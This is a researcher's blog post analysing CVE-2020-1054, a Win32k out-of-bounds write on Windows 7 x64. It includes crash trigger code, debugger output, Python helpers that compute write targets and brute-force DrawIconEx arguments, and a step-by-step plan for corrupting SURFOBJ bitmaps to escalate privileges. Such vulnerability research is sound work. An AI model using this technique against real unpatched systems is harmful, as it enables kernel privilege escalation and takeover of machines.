CVE-2020-1054 Analysis
This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20, "Bugs on the Windshield: Fuzzing the Windows Kernel", which provides insight into how they found this and other bugs.
The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).
The Crash
Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances; however, I found it unnecessary in this case.
The provided crash code:
#include <windows.h>

int main(int argc, char *argv[])
{
    LoadLibrary("user32.dll");
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
               0x0, 0x0, 0x6);
    return 0;
}
Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.
My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced
the bad memory address.
Arg4: 0000000000000005, (reserved)
Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
r8=00000000000008f0 r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36 mov esi,dword ptr [r14] ds:00000000`00000000=????????
STACK_TEXT:
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)
The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:
It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. Check Point Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.
I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write.
Note that the value c7000240 will be referenced throughout the blog post. This value changes across system reboots and sometimes per program execution; for the sake of continuity, the same value is used throughout.
Controlling OOB Write
The first goal is to understand how the address fffff904'c7000240, which will be referred to as oob_target, can be controlled. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:
Working further backwards, rcx is initialized in one of the first basic blocks of vStrWrite01.
After that, rcx is manipulated in a loop:
A constant value is added to rcx on each pass through the loop. In the assembly this is add ecx, eax. A pseudo-code snippet of the loop:
var_64h = 0x7fffffff;
var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_64h )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}
With this information a rough formula arises for oob_target:
oob_target = initial_value + loop_iterations * eax
The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:
mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]
ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:
win32k!vStrWrite01:
fffff960`00165118 4885d2 test rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0 fff2aaab 0006aaab
fff2aaab is not identical to arg5 of DrawIconEx, but it looks related. Changing arg5 from 0xfebffffc to 0xfebffffd:
win32k!vStrWrite01:
fffff960`00165118 4885d2 test rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0 fff2aaac 0006aaaa
The result is fff2aaac, which indicates that the two values are related.
Altering arg5 and observing the changes to oob_target provides additional insight.
If arg5 = 0xff000000 there is a minor change to oob_target:
win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c cmp ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240 ????????`???????? ????????`????????
If arg5 = 0xfd000000 there is a major change to oob_target:
win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c cmp ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240 ????????`???????? ????????`????????
Interestingly, no matter the value of arg5, the lower 32 bits of oob_target remain c7000240. Additionally, a decrease in the value of arg5 (treated as unsigned) results in an increase in oob_target.
eax in the oob_target formula is set via an offset from r15:
Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address of some structure. In the second basic block of the function r15 is set as follows:
mov r15, r8 // r8 is still arg2 here
r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:
The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.
The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjacent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SURFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.
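To make the layout concrete, here is a minimal sketch that models the two structures with ctypes and prints the offsets of the three boxed members. The SURFOBJ field order follows the public winddi.h definition. The BASEOBJECT layout is undocumented, so the one used here is an assumption taken from commonly circulated reverse-engineering notes for x64, and the class names are hypothetical.

```python
import ctypes as ct


class SIZEL(ct.Structure):
    _fields_ = [("cx", ct.c_int32), ("cy", ct.c_int32)]


class BASEOBJECT64(ct.Structure):
    # Assumption: undocumented x64 layout from public reversing notes.
    _fields_ = [
        ("hHmgr", ct.c_uint64),
        ("ulShareCount", ct.c_uint32),
        ("cExclusiveLock", ct.c_uint16),
        ("BaseFlags", ct.c_uint16),
        ("Tid", ct.c_uint64),
    ]


class SURFOBJ64(ct.Structure):
    # Field order per winddi.h; handles and pointers modelled as 64-bit ints.
    _fields_ = [
        ("dhsurf", ct.c_uint64),
        ("hsurf", ct.c_uint64),
        ("dhpdev", ct.c_uint64),
        ("hdev", ct.c_uint64),
        ("sizlBitmap", SIZEL),
        ("cjBits", ct.c_uint32),
        ("pvBits", ct.c_uint64),
        ("pvScan0", ct.c_uint64),
        ("lDelta", ct.c_int32),
        ("iUniq", ct.c_uint32),
        ("iBitmapFormat", ct.c_uint32),
        ("iType", ct.c_uint16),
        ("fjBitmap", ct.c_uint16),
    ]


class SurfaceHead64(ct.Structure):
    # BASEOBJECT immediately followed by SURFOBJ, as seen in the dump.
    _fields_ = [("base", BASEOBJECT64), ("so", SURFOBJ64)]


def field_offset(name):
    """Offset of a SURFOBJ member measured from the start of BASEOBJECT."""
    return SurfaceHead64.so.offset + getattr(SURFOBJ64, name).offset


for member in ("sizlBitmap", "pvScan0", "lDelta"):
    print("%-10s +0x%02x" % (member, field_offset(member)))
```

Under these assumptions sizlBitmap sits 0x38 bytes into the object, which is worth keeping in mind when a target offset ending in 0x38 shows up later.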
The next step, however, is to fully understand how loop_iterations from the oob_target formula is controlled via arg5 of DrawIconEx.
Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The relevant function is vInitStrDDA, and the notes.txt file in my GitHub repo contains extra detail.
DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):
# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500
loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30
lDelta = arg1 // 8
oob = loop_iterations * lDelta
upper32_inc = oob & 0xffffffff00000000
print("loop_iterations = %x" % loop_iterations)
print("lDelta = %x" % lDelta)
print("upper 32 inc. = %x" % upper32_inc)
This shows that arg5 of DrawIconEx directly controls loop_iterations and arg1 of CreateCompatibleBitmap directly controls lDelta.
However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.
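As a sanity check, the formula can be run against the arg5 values tried earlier. The sketch below wraps the same arithmetic in a hypothetical helper, predict_oob_target. The base address fffff900'c7000240 is an assumption taken from the crash dump (rax plus the constant lower 32 bits), and the bitmap width is the 0x51500 used throughout.

```python
MASK32 = 0xFFFFFFFF


def predict_oob_target(arg5, bitmap_width, base=0xFFFFF900C7000240):
    """Apply the formula from this post; only the upper 32 bits move."""
    loop_iterations = ((1 - arg5) & MASK32) // 0x30
    l_delta = bitmap_width // 8
    upper32_inc = (loop_iterations * l_delta) & 0xFFFFFFFF00000000
    return base + upper32_inc


# arg5 values used earlier in the post, plus the one from the formula above
for arg5 in (0xFEBFFFFC, 0xFF000000, 0xFD000000, 0xFFB00000):
    print("arg5 = %08x -> oob_target = %016x"
          % (arg5, predict_oob_target(arg5, 0x51500)))
```

The predictions line up with the WinDbg output shown earlier: fffff904 for the crash value, fffff903 and fffff90a for the two experiments, and fffff901 for the value used in the formula.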
The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01, two writes can be performed:
// write 1
win32k!vStrWrite01+0x417
mov dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov dword ptr [r14],esi
The content of esi is determined by either of the following:
esi is either bitwise OR’d or bitwise AND’d with some value.
Running the crash code calls DrawIconEx as:
DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
0x0, 0x0, 0x6);
Using this call to DrawIconEx the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of DrawIconEx stands out to me.
The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is DI_IMAGE (0x2) combined with DI_COMPAT (0x4, documented as ignored), so it is effectively DI_IMAGE, which “Draws the icon or cursor using the image”.
The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.
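For reference, a small sketch that decodes a diFlags value into its named bits. The constants are the DI_* values from winuser.h; the helper name decode_di_flags is hypothetical.

```python
# DI_* bit values as defined in winuser.h (DI_NORMAL is DI_MASK | DI_IMAGE)
DI_FLAGS = {
    0x0001: "DI_MASK",
    0x0002: "DI_IMAGE",
    0x0004: "DI_COMPAT",
    0x0008: "DI_DEFAULTSIZE",
    0x0010: "DI_NOMIRROR",
}


def decode_di_flags(value):
    """Return the names of all DI_* bits set in value."""
    return [name for bit, name in DI_FLAGS.items() if value & bit]


print(hex(0x6), decode_di_flags(0x6))  # flags used by the crash code
print(hex(0x1), decode_di_flags(0x1))  # flags that reach the OR branch
```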
Exploitation Strategy
Now that the capabilities of the OOB write are understood, it is time to develop an exploitation strategy. The capabilities are a far cry from an all-powerful write-what-where; however, in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.
At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.
The SURFOBJ struct contains useful members such as pvScan0 and sizlBitmap. pvScan0 points to the actual bitmap data. This data can be read and written using GetBitmapBits and SetBitmapBits. sizlBitmap is two dwords that contain the width and height of the bitmap. Classically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan0 with the address of the second SURFOBJ’s (referred to as Worker) pvScan0. This then allows a reusable/relocatable write-what-where primitive.
The capabilities of this OOB write are listed as:
what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240
Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap.
On Windows 7 (and older versions of Windows 10) the SURFOBJs and the data their pvScan0 members point to are laid out contiguously.
This means that if it is possible to increase either the width or height of sizlBitmap, it will be possible to write past the end of the SURFOBJ’s pvScan0 data using a call to SetBitmapBits.
If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan0 address can be overwritten. This second SURFOBJ can then be used via SetBitmapBits for a powerful write-what-where primitive.
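The idea can be illustrated with a toy model. This is only a sketch under simplifying assumptions: a bytearray stands in for kernel memory, each "surface" has a hypothetical 16-byte header (width, height, pvScan0) followed directly by one byte per pixel, and set_bits is a stand-in for SetBitmapBits that clips the copy to width * height. None of these names or sizes come from Win32k.

```python
import struct

HEADER_FMT = "<IIQ"                        # toy header: width, height, pvScan0
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 16 bytes


class ToyPool:
    """Flat bytearray standing in for kernel memory (hypothetical model)."""

    def __init__(self, size):
        self.mem = bytearray(size)

    def alloc_surface(self, base, width, height):
        # Header first, pixel data directly after it (contiguous layout).
        struct.pack_into(HEADER_FMT, self.mem, base,
                         width, height, base + HEADER_SIZE)
        return base

    def header(self, base):
        return struct.unpack_from(HEADER_FMT, self.mem, base)

    def set_bits(self, base, data):
        # Stand-in for SetBitmapBits: copy is clipped to width * height bytes.
        width, height, pv_scan0 = self.header(base)
        n = min(len(data), width * height)
        self.mem[pv_scan0:pv_scan0 + n] = data[:n]
        return n


pool = ToyPool(0x100)
first = pool.alloc_surface(0x00, 4, 4)   # header 0x00-0x0f, data 0x10-0x1f
second = pool.alloc_surface(0x20, 4, 4)  # header 0x20-0x2f, data 0x30-0x3f

# Before corruption, an oversized write through `first` is clipped.
clipped = pool.set_bits(first, b"\xcc" * 64)

# Model the OOB bitwise OR landing on the height field of `first`.
_, height, _ = pool.header(first)
struct.pack_into("<I", pool.mem, first + 4, height | 0x100)

# The enlarged bitmap now reaches the header of `second` and replaces pvScan0.
target = 0x80
payload = b"\x00" * 16 + struct.pack(HEADER_FMT, 4, 4, target)
pool.set_bits(first, payload)

# `second` now writes wherever its pvScan0 points.
pool.set_bits(second, b"AAAA")
print(hex(pool.header(second)[2]), bytes(pool.mem[target:target + 4]))
```

The point of the model is that a single enlarged dimension is enough: the rest of the primitive is built from ordinary, bounds-checked bitmap writes.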
Taking all the information learned up to this point a rough exploitation strategy can be formulated.
1. Allocate a base bitmap (fffff900'c7000000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that
one is allocated at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
3. Calculate loop_iterations*lDelta such that oob_target is equal to fffff901'c7000240.
4. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
5. Use SetBitmapBits with second SURFOBJ to overwrite pvScan0 of third SURFOBJ.
6. Arbitrary reusable write is now obtained.
7. Typical EoP: overwrite process token privileges and inject into winlogon.exe.
A bad visual representation:
Every step is easily accomplished with the exception of step 4, the OOB write that overwrites sizlBitmap. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR.
A bitwise OR can only set bits, so the value never decreases, which is what is required.
Accurately targeting the width or height of sizlBitmap is the challenge.
Recall from the start of the blog post that oob_target is set via lea r14, [rcx + rax*4].
Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.
Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:
This provides the ability to set an offset from the start of the lower 32 bits where
offset = (arg1 // 0x20 ) * 0x4 + 0x240
Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information.
arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:
The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in pseudo-code as:
initial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while (arg2)
{
    write_location_1 = initial_value + lDelta * loop_count;
    write_location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}
Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s sizlBitmap.
The three values are arg1, arg2 and lDelta (width of bitmap // 8).
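The relationship between the three values is easier to see when the write locations are enumerated. Below is a minimal sketch of the loop described above as a hypothetical helper, write_locations, that returns offsets relative to the start of the targeted region rather than full kernel addresses. The 0x240 starting offset is the one observed in this post.

```python
def write_locations(arg1, arg2, bitmap_width, base_offset=0x240):
    """Return (write_location_1, write_location_2) offsets for each pass."""
    l_delta = bitmap_width // 8
    first = base_offset + (arg1 // 0x20) * 0x4
    return [(first + l_delta * i, first + l_delta * i + 4)
            for i in range(arg2)]


# Example: arg1 = 0x20, arg2 = 0x2, bitmap width 0x51500 (lDelta = 0xa2a0)
for w1, w2 in write_locations(0x20, 0x2, 0x51500):
    print("write 1 at +0x%x, write 2 at +0x%x" % (w1, w2))
```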
This can be bruteforced with ugly Python:
print("bruting function arguments...")
# start with size at 0x50000
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8
    # lDelta is always aligned, so skip values whose low 4 bits are not clear
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0, 0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, "
                          "loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))
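The brute force walks every bitmap size, which is slow in Python. As an alternative sketch, the same equation can be solved for lDelta directly, so only arg1 and arg2 need to be iterated. The helper name solve_arguments is hypothetical, the target 0x70038 and the alignment check are taken from the script above, and for each lDelta only the smallest matching size (lDelta * 8) is reported, whereas the brute force would list all eight sizes that share that lDelta.

```python
def solve_arguments(target=0x70038, base_offset=0x240,
                    min_size=0x50000, max_size=0xFFFFFF):
    """Find (size, arg1, lDelta, arg2) with offset + arg2 * lDelta == target."""
    results = []
    for arg1 in range(0x0, 0xFFF, 0x20):
        offset = (arg1 // 0x20) * 0x4 + base_offset
        remaining = target - offset
        for arg2 in range(0x1, 0x10):   # arg2 == 0 can never reach the target
            if remaining <= 0 or remaining % arg2:
                continue
            l_delta = remaining // arg2
            if l_delta & 0x0F:          # same alignment check as the brute force
                continue
            size = l_delta * 8          # smallest width giving this lDelta
            if min_size <= size < max_size:
                results.append((size, arg1, l_delta, arg2))
    return results


for size, arg1, l_delta, arg2 in solve_arguments():
    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, "
          "loop_count (arg2) {:x}".format(size, arg1, l_delta, arg2))
```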
Now that all values are understood, all that remains is to write the exploit code.
Exploitation Code
Exploitation code is available on my GitHub. Demoing the exploit:
Windows 7 KB
Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvement to make memory calculations completely generic.
While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238.
Within the exploit code are 2 comments that mark what value to use depending on whether the Windows 7 host is pre- or post-KB.
I have narrowed down the KBs and will update with the exact KB later.
Thanks to Netanel Ben-Simon, Yoav Alon and bee13oy for finding the bug.